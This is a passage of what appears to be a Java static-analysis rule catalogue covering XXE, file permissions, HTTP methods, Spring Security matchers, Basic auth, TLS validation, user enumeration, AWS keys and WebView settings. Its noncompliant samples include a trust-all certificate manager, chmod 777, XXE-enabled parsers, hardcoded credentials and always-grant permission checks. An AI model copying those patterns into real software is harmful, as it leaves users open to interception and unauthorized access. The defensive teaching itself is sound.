// Sensitive: creating a new custom configuration
abstract class CustomConfigFactory extends ConfigurationFactory {
    // ...
}

class A {
    void foo(Configuration config, LoggerContext context, java.util.Map<String, Level> levelMap,
            Appender appender, java.io.InputStream stream, java.net.URI uri,
            java.io.File file, java.net.URL url, String source, ClassLoader loader, Level level, Filter filter)
            throws java.io.IOException {
        // Creating a new custom configuration
        ConfigurationBuilderFactory.newConfigurationBuilder();  // Sensitive

        // Setting loggers level can result in writing sensitive information in production
        Configurator.setAllLevels("com.example", Level.DEBUG);  // Sensitive
        Configurator.setLevel("com.example", Level.DEBUG);  // Sensitive
        Configurator.setLevel(levelMap);  // Sensitive
        Configurator.setRootLevel(Level.DEBUG);  // Sensitive

        config.addAppender(appender); // Sensitive: this modifies the configuration

        LoggerConfig loggerConfig = config.getRootLogger();
        loggerConfig.addAppender(appender, level, filter); // Sensitive
        loggerConfig.setLevel(level); // Sensitive

        context.setConfigLocation(uri); // Sensitive

        // Load the configuration from a stream or file
        new ConfigurationSource(stream);  // Sensitive
        new ConfigurationSource(stream, file);  // Sensitive
        new ConfigurationSource(stream, url);  // Sensitive
        ConfigurationSource.fromResource(source, loader);  // Sensitive
        ConfigurationSource.fromUri(uri);  // Sensitive
    }
}
// === java.util.logging ===
import java.util.logging.*;

class M {
    void foo(LogManager logManager, Logger logger, java.io.InputStream is, Handler handler)
            throws SecurityException, java.io.IOException {
        logManager.readConfiguration(is); // Sensitive

        logger.setLevel(Level.FINEST); // Sensitive
        logger.addHandler(handler); // Sensitive
    }
}
// === Logback ===
import ch.qos.logback.classic.util.ContextInitializer;
import ch.qos.logback.core.Appender;
import ch.qos.logback.classic.joran.JoranConfigurator;
import ch.qos.logback.classic.spi.ILoggingEvent;
import ch.qos.logback.classic.*;

class M {
    void foo(Logger logger, Appender<ILoggingEvent> fileAppender) {
        System.setProperty(ContextInitializer.CONFIG_FILE_PROPERTY, "config.xml"); // Sensitive
        JoranConfigurator configurator = new JoranConfigurator(); // Sensitive

        logger.addAppender(fileAppender); // Sensitive
        logger.setLevel(Level.DEBUG); // Sensitive
    }
}

Exceptions

Log4J 1.x is not covered as it has reached end of life.

See

java:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in Java SE

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); // Noncompliant

Compliant solution

Protection from XXE can be achieved in several different ways. Choose one depending on how the affected parser object is used in your code.

1. The first way is to completely disable DOCTYPE declarations:

// Applicable to:
// - DocumentBuilderFactory
// - SAXParserFactory
// - SchemaFactory
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

// For XMLInputFactory:
factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);

2. Disable external entity declarations completely:

// Applicable to:
// - DocumentBuilderFactory
// - SAXParserFactory
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

// For XMLInputFactory:
factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);

3. Prohibit the use of all protocols by external entities:

// `setAttribute` variant, applicable to:
// - DocumentBuilderFactory
// - TransformerFactory
factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

// `setProperty` variant, applicable to:
// - XMLInputFactory
// - SchemaFactory
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

// For SAXParserFactory, the prohibition is done on child objects:
SAXParser parser = factory.newSAXParser();
parser.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
parser.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.
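As a sketch of such a whitelist with a SAX-based parser, a custom EntityResolver can resolve only known system IDs and map everything else to an empty input (the allowed URL below is hypothetical). An instance would be passed to XMLReader.setEntityResolver or DocumentBuilder.setEntityResolver.

```java
import java.io.StringReader;
import java.util.Set;
import org.xml.sax.EntityResolver;
import org.xml.sax.InputSource;

public class WhitelistingResolver implements EntityResolver {
    // Hypothetical whitelist: only these system IDs may be resolved.
    private static final Set<String> ALLOWED = Set.of("https://example.com/schema.dtd");

    @Override
    public InputSource resolveEntity(String publicId, String systemId) {
        if (systemId != null && ALLOWED.contains(systemId)) {
            return null; // null lets the parser resolve the trusted entity itself
        }
        // Anything else resolves to an empty document instead of the real resource.
        return new InputSource(new StringReader(""));
    }
}
```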

Going the extra mile

Disable entity expansion

Specifically for DocumentBuilderFactory, it is possible to disable the entity expansion. Note, however, that this does not prevent the retrieval of external entities.

factory.setExpandEntityReferences(false);

Resources

Standards

java:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

    public void setPermissions(String filePath) {
        Set<PosixFilePermission> perms = new HashSet<PosixFilePermission>();
        // user permission
        perms.add(PosixFilePermission.OWNER_READ);
        perms.add(PosixFilePermission.OWNER_WRITE);
        perms.add(PosixFilePermission.OWNER_EXECUTE);
        // group permissions
        perms.add(PosixFilePermission.GROUP_READ);
        perms.add(PosixFilePermission.GROUP_EXECUTE);
        // others permissions
        perms.add(PosixFilePermission.OTHERS_READ); // Sensitive
        perms.add(PosixFilePermission.OTHERS_WRITE); // Sensitive
        perms.add(PosixFilePermission.OTHERS_EXECUTE); // Sensitive

        Files.setPosixFilePermissions(Paths.get(filePath), perms);
    }
    public void setPermissionsUsingRuntimeExec(String filePath) {
        Runtime.getRuntime().exec("chmod 777 file.json"); // Sensitive
    }
    public void setOthersPermissionsHardCoded(String filePath ) {
        Files.setPosixFilePermissions(Paths.get(filePath), PosixFilePermissions.fromString("rwxrwxrwx")); // Sensitive
    }

Compliant Solution

On operating systems that implement the POSIX standard (this will throw an UnsupportedOperationException on Windows):

    public void setPermissionsSafe(String filePath) throws IOException {
        Set<PosixFilePermission> perms = new HashSet<PosixFilePermission>();
        // user permission
        perms.add(PosixFilePermission.OWNER_READ);
        perms.add(PosixFilePermission.OWNER_WRITE);
        perms.add(PosixFilePermission.OWNER_EXECUTE);
        // group permissions
        perms.add(PosixFilePermission.GROUP_READ);
        perms.add(PosixFilePermission.GROUP_EXECUTE);
        // others permissions removed
        perms.remove(PosixFilePermission.OTHERS_READ); // Compliant
        perms.remove(PosixFilePermission.OTHERS_WRITE); // Compliant
        perms.remove(PosixFilePermission.OTHERS_EXECUTE); // Compliant

        Files.setPosixFilePermissions(Paths.get(filePath), perms);
    }
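To avoid the UnsupportedOperationException on non-POSIX file systems, the availability of the POSIX attribute view can be probed first. A small defensive sketch (the permission string and fallback behavior are illustrative):

```java
import java.io.IOException;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.PosixFilePermissions;

public class PortablePermissions {
    public static boolean restrictToOwnerAndGroup(Path path) throws IOException {
        // POSIX permission views are unavailable on plain Windows file systems.
        if (!FileSystems.getDefault().supportedFileAttributeViews().contains("posix")) {
            return false; // caller can fall back to File.setReadable/setWritable
        }
        // No permissions for "others"; owner full, group read/execute.
        Files.setPosixFilePermissions(path, PosixFilePermissions.fromString("rwxr-x---"));
        return true;
    }
}
```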

See

java:S3752

An HTTP method is safe when used to perform a read-only operation, such as retrieving information. In contrast, an unsafe HTTP method is used to change the state of an application, for instance to update a user’s profile on a web application.

Common safe HTTP methods are GET, HEAD, or OPTIONS.

Common unsafe HTTP methods are POST, PUT and DELETE.

Allowing both safe and unsafe HTTP methods to perform a specific operation on a web application can impact its security; for example, CSRF protections usually only cover operations performed with unsafe HTTP methods.

Ask Yourself Whether

  • HTTP methods are not defined at all for a route/controller of the application.
  • Safe HTTP methods are defined and used for a route/controller that can change the state of an application.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

For all the routes/controllers of an application, the authorized HTTP methods should be explicitly defined and safe HTTP methods should only be used to perform read-only operations.

Sensitive Code Example

@RequestMapping("/delete_user")  // Sensitive: by default all HTTP methods are allowed
public String delete1(String username) {
// state of the application will be changed here
}

@RequestMapping(path = "/delete_user", method = {RequestMethod.GET, RequestMethod.POST}) // Sensitive: both safe and unsafe methods are allowed
String delete2(@RequestParam("id") String id) {
// state of the application will be changed here
}

Compliant Solution

@RequestMapping(value = "/delete_user", method = RequestMethod.POST)  // Compliant
public String delete1(String username) {
// state of the application will be changed here
}

@RequestMapping(path = "/delete_user", method = RequestMethod.POST) // Compliant
String delete2(@RequestParam("id") String id) {
// state of the application will be changed here
}
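On Spring 4.3 and later, the method-specific shorthand annotations express the same restriction more concisely. A sketch (controller and handler names are illustrative; this is a framework fragment, not standalone code):

```java
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class UserController {
    // @PostMapping is shorthand for @RequestMapping(method = RequestMethod.POST),
    // so only the unsafe POST method can trigger this state change.
    @PostMapping("/delete_user")
    public String delete(@RequestParam("id") String id) {
        // state of the application will be changed here
        return "deleted";
    }
}
```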

See

java:S4601

Why is this an issue?

URL patterns configured on an HttpSecurity.authorizeRequests() method are considered in the order they were declared. It’s easy to make a mistake and declare a less restrictive configuration before a more restrictive one, so the order of the "antMatchers" declarations must be reviewed. The /** pattern, if declared, should be the last one.

This rule raises an issue when:

  • A pattern is preceded by another that ends with ** and has the same beginning. E.g.: /page*-admin/db/** is after /page*-admin/**
  • A pattern without wildcard characters is preceded by another that matches. E.g.: /page-index/db is after /page*/**

Noncompliant code example

  protected void configure(HttpSecurity http) throws Exception {
    http.authorizeRequests()
      .antMatchers("/resources/**", "/signup", "/about").permitAll() // Compliant
      .antMatchers("/admin/**").hasRole("ADMIN")
      .antMatchers("/admin/login").permitAll() // Noncompliant; the pattern "/admin/login" should appear before "/admin/**"
      .antMatchers("/**", "/home").permitAll()
      .antMatchers("/db/**").access("hasRole('ADMIN') and hasRole('DBA')") // Noncompliant; the pattern "/db/**" should occur before "/**"
      .and().formLogin().loginPage("/login").permitAll().and().logout().permitAll();
  }

Compliant solution

  protected void configure(HttpSecurity http) throws Exception {
    http.authorizeRequests()
      .antMatchers("/resources/**", "/signup", "/about").permitAll() // Compliant
      .antMatchers("/admin/login").permitAll()
      .antMatchers("/admin/**").hasRole("ADMIN") // Compliant
      .antMatchers("/db/**").access("hasRole('ADMIN') and hasRole('DBA')")
      .antMatchers("/**", "/home").permitAll() // Compliant; "/**" is the last one
      .and().formLogin().loginPage("/login").permitAll().and().logout().permitAll();
  }

Resources

java:S1313

Hardcoding IP addresses is security-sensitive: hardcoded addresses have led to vulnerabilities in the past.

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to make a rapid fix every time this happens, instead of having an operations team change a configuration file.
  • It encourages using the same address in every environment (dev, sys, qa, prod), which is misleading.

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to gain access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but with a hardcoded IP address, solving the issue takes more time, which increases the attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

String ip = "192.168.12.42"; // Sensitive
Socket socket = new Socket(ip, 6667);

Compliant Solution

String ip = System.getenv("IP_ADDRESS"); // Compliant
Socket socket = new Socket(ip, 6667);
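A configuration file works equally well. A sketch (the file name, property key, and default value are illustrative choices):

```java
import java.io.FileReader;
import java.util.Properties;

public class NetworkConfig {
    // "server.ip" is an illustrative key name; operations teams can edit the
    // properties file without requiring a rebuild of the software.
    public static String serverAddress(String configPath) throws Exception {
        Properties props = new Properties();
        try (FileReader reader = new FileReader(configPath)) {
            props.load(reader);
        }
        return props.getProperty("server.ip", "localhost");
    }
}
```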

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

java:S2647

Why is this an issue?

Basic authentication’s only means of obfuscation is Base64 encoding. Since Base64 encoding is easily recognized and reversed, it offers only the thinnest veil of protection to your users, and should not be used.

Noncompliant code example

// Using HttpPost from Apache HttpClient
String encoding = Base64Encoder.encode("login:passwd");
org.apache.http.client.methods.HttpPost httppost = new HttpPost(url);
httppost.setHeader("Authorization", "Basic " + encoding);  // Noncompliant

or

// Using HttpURLConnection
String encoding = Base64.getEncoder().encodeToString(("login:passwd").getBytes("UTF-8"));
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
conn.setRequestMethod("POST");
conn.setDoOutput(true);
conn.setRequestProperty("Authorization", "Basic " + encoding); // Noncompliant
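When the server supports it, a bearer token sent over TLS avoids embedding reversibly encoded credentials in every request. A sketch (the token is assumed to come from a real authorization flow such as OAuth 2.0, never from a hardcoded secret):

```java
import java.net.HttpURLConnection;
import java.net.URL;

public class TokenClient {
    // accessToken is assumed to be obtained from a proper authorization flow
    // (e.g. OAuth 2.0); unlike Basic auth, it is not a reversible encoding
    // of the user's password.
    public static HttpURLConnection openAuthorized(URL url, String accessToken) throws Exception {
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Authorization", "Bearer " + accessToken);
        return conn;
    }
}
```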

Resources

java:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Java Cryptographic Extension

Code examples

The following code contains examples of disabled certificate validation.

Certificate validation is disabled by overriding X509TrustManager with an empty implementation. It is highly recommended to use the original implementation instead.

Noncompliant code example

class TrustAllManager implements X509TrustManager {

    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {  // Noncompliant
    }

    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException { // Noncompliant
    }

    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return null;
    }
}

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Here is a sample command to import a certificate to the Java trust store:

keytool -import -alias myserver -file myserver.crt -keystore cacerts
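The programmatic equivalent is to load that trust store into an SSLContext while keeping the default validation logic intact. A sketch (the path and password are placeholders):

```java
import java.io.FileInputStream;
import java.security.KeyStore;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManagerFactory;

public class TrustStoreContext {
    public static SSLContext fromTrustStore(String path, char[] password) throws Exception {
        KeyStore trustStore = KeyStore.getInstance(KeyStore.getDefaultType());
        try (FileInputStream in = new FileInputStream(path)) {
            trustStore.load(in, password);
        }
        // The default TrustManagerFactory performs full certificate validation
        // against the supplied store; nothing is disabled or overridden.
        TrustManagerFactory tmf =
            TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init(trustStore);
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, tmf.getTrustManagers(), null);
        return ctx;
    }
}
```

The resulting context can be used, for example, via `ctx.getSocketFactory()` on an HttpsURLConnection.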

Resources

Standards

java:S5808

Why is this an issue?

Authorizations granted or denied to users accessing resources of an application should be based on strong decisions: for instance, whether the user is authenticated and has the right roles or privileges. The decision may also depend on the user’s location, or on the date and time at which the user requests access.

Noncompliant code example

In a Spring-security web application:

  • the vote method of an AccessDecisionVoter type is not compliant when it only ever returns an affirmative decision (ACCESS_GRANTED) or abstains from making a decision (ACCESS_ABSTAIN):
public class WeakNightVoter implements AccessDecisionVoter {
    @Override
    public int vote(Authentication authentication, Object object, Collection collection) {  // Noncompliant

      Calendar calendar = Calendar.getInstance();

      int currentHour = calendar.get(Calendar.HOUR_OF_DAY);

      if(currentHour >= 8 && currentHour <= 19) {
        return ACCESS_GRANTED; // Noncompliant
      }

      // when users connect during the night, do not make decision
      return ACCESS_ABSTAIN; // Noncompliant
    }
}
  • the hasPermission method of a PermissionEvaluator type is not compliant when it never returns false:
public class MyPermissionEvaluator implements PermissionEvaluator {
    @Override
    public boolean hasPermission(Authentication authentication, Object targetDomainObject, Object permission) {
        //Getting subject
        Object user = authentication.getPrincipal();

        if(user.getRole().equals(permission)) {
              return true; // Noncompliant
        }

        return true;  // Noncompliant
    }
}

Compliant solution

In a Spring-security web application:

  • the vote method of an AccessDecisionVoter type should return a negative decision (ACCESS_DENIED):
public class StrongNightVoter implements AccessDecisionVoter {
    @Override
    public int vote(Authentication authentication, Object object, Collection collection) {

      Calendar calendar = Calendar.getInstance();

      int currentHour = calendar.get(Calendar.HOUR_OF_DAY);

      if(currentHour >= 8 && currentHour <= 19) {
        return ACCESS_GRANTED;
      }

      // users are not allowed to connect during the night
      return ACCESS_DENIED; // Compliant
    }
}
public class MyPermissionEvaluator implements PermissionEvaluator {
    @Override
    public boolean hasPermission(Authentication authentication, Object targetDomainObject, Object permission) {
        //Getting subject
        Object user = authentication.getPrincipal();

        if(user.getRole().equals(permission)) {
              return true;
        }

        return false; // Compliant
    }
}

Exceptions

No issue is reported when the method throws an exception as it might be used to indicate a strong decision.

Resources

java:S2658

This rule is deprecated; use S6173 instead.

Why is this an issue?

Dynamically loaded classes could contain malicious code executed by a static class initializer, i.e., you wouldn’t even have to instantiate or explicitly invoke methods on such classes to be vulnerable to an attack.

This rule raises an issue for each use of dynamic class loading.

Noncompliant code example

String className = System.getProperty("messageClassName");
Class<?> clazz = Class.forName(className);  // Noncompliant
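A common mitigation, sketched below with illustrative class names, is to validate the class name against an allow-list before loading it, so untrusted input cannot trigger arbitrary static initializers:

```java
import java.util.Set;

// Hedged sketch: the allow-list contents and method names are illustrative.
class SafeLoader {
    private static final Set<String> ALLOWED =
        Set.of("java.lang.String", "java.util.ArrayList");

    // Only loads classes that appear on the allow-list.
    static Class<?> loadMessageClass(String className) {
        if (!ALLOWED.contains(className)) {
            throw new IllegalArgumentException("Class not allowed: " + className);
        }
        try {
            return Class.forName(className); // input restricted to known classes
        } catch (ClassNotFoundException e) {
            throw new IllegalArgumentException("Unknown class: " + className, e);
        }
    }
}
```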

Resources

java:S5804

User enumeration refers to the ability to guess existing usernames in a web application database. This can happen, for example, when using "sign-in/sign-on/forgot password" functionalities of a website.

When a user tries to "sign-in" to a website with an incorrect username/login, the web application should not disclose that the username doesn’t exist with a message similar to "this username is incorrect". Instead, a generic message such as "bad credentials" should be used, so that it is not possible to guess whether the username or the password was incorrect during authentication.

If a user-management feature discloses information about the existence of a username, attackers can use brute force attacks to retrieve a large number of valid usernames, which will impact the privacy of the corresponding users and facilitate other attacks (phishing, password guessing, etc.).

Ask Yourself Whether

  • The application discloses that a username exists in its database: most of the time this kind of leak can be avoided, except for the "registration/sign-on" part of a website, because there the user must choose a valid username (one not already taken by another user).
  • There is no rate limiting and CAPTCHA protection in place for requests involving a username.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

When a user performs a request involving a username, it should not be possible to spot differences between a valid and incorrect username:

  • Error messages should be generic and not disclose if the username is valid or not.
  • The response time must be similar whether the username is valid or not.
  • CAPTCHA and other rate limiting solutions should be implemented.
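The first two practices can be illustrated with a small, self-contained sketch (all names, the user store, and the hashing scheme are illustrative, not part of Spring Security): the same hash comparison runs whether or not the username exists, and the same generic message is returned in both failure cases.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Map;

// Hedged sketch: illustrative in-memory user store and SHA-256 hashing.
class ConstantTimeAuth {
    private static final Map<String, String> USERS = Map.of("alice", sha256("s3cret"));
    // Dummy hash compared against when the username is unknown, so the
    // comparison work happens for valid and invalid usernames alike.
    private static final String DUMMY_HASH = sha256("dummy-password");

    static String sha256(String s) {
        try {
            byte[] d = MessageDigest.getInstance("SHA-256")
                .digest(s.getBytes(StandardCharsets.UTF_8));
            StringBuilder sb = new StringBuilder();
            for (byte b : d) sb.append(String.format("%02x", b));
            return sb.toString();
        } catch (Exception e) {
            throw new IllegalStateException(e);
        }
    }

    // Returns the same generic message for an unknown user and a wrong password.
    static String authenticate(String username, String password) {
        String stored = USERS.getOrDefault(username, DUMMY_HASH);
        boolean ok = MessageDigest.isEqual(
                stored.getBytes(StandardCharsets.UTF_8),
                sha256(password).getBytes(StandardCharsets.UTF_8))
            && USERS.containsKey(username);
        return ok ? "welcome" : "Bad credentials";
    }
}
```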

Sensitive Code Example

In a Spring-security web application, the username leaks when:

  • The string used as the argument of the loadUserByUsername method is used in an exception message:
public String authenticate(String username, String password) {
  // ....
  MyUserDetailsService s1 = new MyUserDetailsService();
  MyUserPrincipal u1 = s1.loadUserByUsername(username);

  if(u1 == null) {
    throw new BadCredentialsException(username+" doesn't exist in our database"); // Sensitive
  }
  // ....
}
  • A UsernameNotFoundException is thrown, disclosing that the username does not exist:
public String authenticate(String username, String password) {
  // ....
  if(user == null) {
      throw new UsernameNotFoundException("user not found"); // Sensitive
  }
  // ....
}
  • HideUserNotFoundExceptions is set to false on the authentication provider:
DaoAuthenticationProvider daoauth = new DaoAuthenticationProvider();
daoauth.setUserDetailsService(new MyUserDetailsService());
daoauth.setPasswordEncoder(new BCryptPasswordEncoder());
daoauth.setHideUserNotFoundExceptions(false); // Sensitive
builder.authenticationProvider(daoauth);

Compliant Solution

In a Spring-security web application:

  • the same message should be used regardless of whether it is the wrong user or password:
public String authenticate(String username, String password) throws AuthenticationException {
  Details user = null;
  try {
    user = loadUserByUsername(username);
  } catch (UsernameNotFoundException | DataAccessException e) {
    // Hide this exception reason to not disclose that the username doesn't exist
  }
  if (user == null || !user.isPasswordCorrect(password)) {
     // User should not be able to guess if the bad credentials message is related to the username or the password
    throw new BadCredentialsException("Bad credentials");
  }
}
  • HideUserNotFoundExceptions should be set to true so that UsernameNotFoundException is reported as a generic BadCredentialsException:
DaoAuthenticationProvider daoauth = new DaoAuthenticationProvider();
daoauth.setUserDetailsService(new MyUserDetailsService());
daoauth.setPasswordEncoder(new BCryptPasswordEncoder());
daoauth.setHideUserNotFoundExceptions(true); // Compliant
builder.authenticationProvider(daoauth);

See

java:S6263

In AWS, long-term access keys remain valid until you manually revoke them. This makes them highly sensitive: any exposure can have serious consequences, so they should be used with care.

This rule will trigger when encountering an instantiation of com.amazonaws.auth.BasicAWSCredentials.

Ask Yourself Whether

  • The access key is used directly in an application or AWS CLI script running on an Amazon EC2 instance.
  • Cross-account access is needed.
  • The access keys need to be embedded within a mobile application.
  • An existing identity provider (SAML 2.0, on-premises identity store) is already in place.

For more information, see Use IAM roles instead of long-term access keys.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Consider using IAM roles or other features of the AWS Security Token Service that provide temporary credentials, limiting the risks.

Sensitive Code Example

import com.amazonaws.auth.AWSCredentials;
import com.amazonaws.auth.BasicAWSCredentials;
// ...

AWSCredentials awsCredentials = new BasicAWSCredentials(accessKeyId, secretAccessKey);

Compliant Solution

Example for AWS STS (see Getting Temporary Credentials with AWS STS).

BasicSessionCredentials sessionCredentials = new BasicSessionCredentials(
   session_creds.getAccessKeyId(),
   session_creds.getSecretAccessKey(),
   session_creds.getSessionToken());

See

java:S6363

WebViews can be used to display web content as part of a mobile application. A browser engine is used to render and display the content. Like a web application, a mobile application that uses WebViews can be vulnerable to Cross-Site Scripting if untrusted code is rendered.

If malicious JavaScript code in a WebView is executed, it can leak the contents of sensitive files when access to local files is enabled.

Ask Yourself Whether

  • No local files have to be accessed by the WebView.
  • The WebView contains untrusted data that could cause harm when rendered.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to disable access to local files for WebViews unless it is necessary. In the case of a successful attack through a Cross-Site Scripting vulnerability, the attacker's attack surface decreases drastically if no files can be read.

Sensitive Code Example

import android.webkit.WebView;

WebView webView = (WebView) findViewById(R.id.webview);
webView.getSettings().setAllowFileAccess(true); // Sensitive
webView.getSettings().setAllowContentAccess(true); // Sensitive

Compliant Solution

import android.webkit.WebView;

WebView webView = (WebView) findViewById(R.id.webview);
webView.getSettings().setAllowFileAccess(false);
webView.getSettings().setAllowContentAccess(false);

See

java:S6362

WebViews can be used to display web content as part of a mobile application. A browser engine is used to render and display the content. Like a web application, a mobile application that uses WebViews can be vulnerable to Cross-Site Scripting if untrusted code is rendered. In the context of a WebView, JavaScript code can exfiltrate local files that might be sensitive or, even worse, access exposed functions of the application, which can result in more severe vulnerabilities such as code injection. Thus, JavaScript support should not be enabled for WebViews unless it is absolutely necessary and the authenticity of the web resources can be guaranteed.

Ask Yourself Whether

  • The WebView only renders static web content that does not require JavaScript code to be executed.
  • The WebView contains untrusted data that could cause harm when rendered.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It is recommended to disable JavaScript support for WebViews unless it is necessary to execute JavaScript code. Only trusted pages should be rendered.

Sensitive Code Example

import android.webkit.WebView;

WebView webView = (WebView) findViewById(R.id.webview);
webView.getSettings().setJavaScriptEnabled(true); // Sensitive

Compliant Solution

import android.webkit.WebView;

WebView webView = (WebView) findViewById(R.id.webview);
webView.getSettings().setJavaScriptEnabled(false);

See

java:S6377

Why is this an issue?

XML signature validations work by parsing third-party data that cannot be trusted until it is actually validated.

As with any other parsing process, unrestricted validation of third-party XML signatures can lead to security vulnerabilities. In this case, threats range from denial of service to confidentiality breaches.

By default, the Java XML Digital Signature API does not apply restrictions on XML signature validation, unless the application runs with a security manager.
To protect the application from these vulnerabilities, set the org.jcp.xml.dsig.secureValidation attribute to true with the javax.xml.crypto.dsig.dom.DOMValidateContext.setProperty method.
This attribute ensures that the code enforces the following restrictions:

  • Forbids the use of XSLT transforms
  • Restricts the number of SignedInfo or Manifest Reference elements to 30 or less
  • Restricts the number of Reference transforms to 5 or less
